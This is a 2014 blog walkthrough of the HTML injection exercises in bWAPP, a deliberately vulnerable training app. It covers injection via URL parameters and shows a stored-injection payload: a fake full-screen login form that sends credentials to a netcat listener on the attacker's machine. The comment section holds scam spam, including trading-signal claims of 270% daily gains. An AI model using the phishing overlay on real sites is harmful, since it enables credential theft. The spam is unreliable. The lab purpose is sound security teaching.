Tuesday, January 14, 2014

bWAPP HTML Injection

Posted by at Tuesday, January 14, 2014 Read our previous post


bWAPP, or a buggy web application, is a deliberately insecure web application.
bWAPP helps security enthusiasts, developers and students to discover and to prevent web vulnerabilities. It prepares to conduct successful penetration testing and ethical hacking projects. It is for educational purposes only.

What makes bWAPP so unique? Well, it has over 60 web bugs!
bWAPP covers all major known web vulnerabilities, including all risks from the OWASP Top 10 project!

The OWASP Top 10 provides an accurate snapshot of the current threat landscape in application security and reflects the collaborative efforts and insights of thousands of accomplished security engineers. To reflect the ongoing changes in technology and common online business practices, the list is periodically updated.

You can download bWAPP from here. Have fun!
It's also possible to download our bee-box, a custom Linux VM pre-installed with bWAPP.


bWAPP HTML Injection

Part 1-4 Low

/HTML Injection - Reflected (GET)/

/HTML Injection - Reflected (POST)/

/HTLM Injection - Reflected (URL)/

/HTML Injection - Stored/



HTML Injection - Reflected GET

For this exercise you're simply adding HTML code into the URL using the parameters "firstname" and "lastname", once submitted the HTML will be injected into the source code and rendered back on the clients browser.


  1. http://<YOUR bWAPP IP>/bWAPP/htmli_get.php?firstname=<ADD HTML HERE>&lastname=<ADD HTML HERE>&form=submit


And you could be creative as much as you want the idea would be to send a link for this legitimate vulnerable webpage with your malicious HTML code embedded into the URI.


HTML Injection - Reflected POST  

So this is the exact same concept as the reflective get injection but instead of directly putting the parameters and in the URL you're going to use a third-party program called tamper which will be a proxy between your browser and the server there you can manipulate the parameters and get the injection results as before


HTML Injection - Reflected URL

Taking a look at the source below will help to verify that this is a DOM-based cross site scripting attack

From the screenshot take note that I'm using IE, if you tried this attack using another browser it will not be successful.


HTML Injection - Stored


You can perform quite a bit of different variations in this one. I'm going to take this example directly from the cheat sheet and that is to craft a malicious login form and redirect the credentials back to the attacker or this case myself.  I really like this example because it's slick and it coincides of how malicious a stored HTML injection can be!     1. Setup a netcat listener on your machine. nc -vlp 80

2.Place malicious login form code into bWAPP - change the default ip of with your the Attackers IP. 



  1. <div style="position: absolute; left: 0px; top:
  2. 0px; width: 1900px; height: 1300px; z-index: 1000;
  3. background-color:white; padding: 1em;">
  4. Please login with valid credentials:<br><form name="login"
  5. action=""><table>
  6. <tr><td>Username:</td><td><input type="text" name="username"/></td>
  7. </tr><tr><td>Password:</td><td><input type="text" name="password"/></td>
  8. </tr><tr><td colspan=2 align=center><input type="submit" value="Login"/>
  9. </td></tr></table></form></div>




With Stored HTMLi this login form will persistently stay for new users to interact with

Once a user logins in with your custom login form their credentials will be pass back to your netcat session.



  1. cant see the image ?? :(

  2. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you must watch this video
    right away...

    (VIDEO) Have your ex CRAWLING back to you...?

  3. Just got my check for $500.

    Many times people don't believe me when I tell them about how much money you can earn taking paid surveys online...

    So I show them a video of myself getting paid $500 for taking paid surveys to set the record straight once and for all.

  4. Quantum Binary Signals

    Get professional trading signals delivered to your cell phone daily.

    Start following our trades today & gain up to 270% per day.

  5. BlueHost is the best hosting provider for any hosting plans you require.


[#] iNFO [#]

All the information provided on this site is for educational purposes only.
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template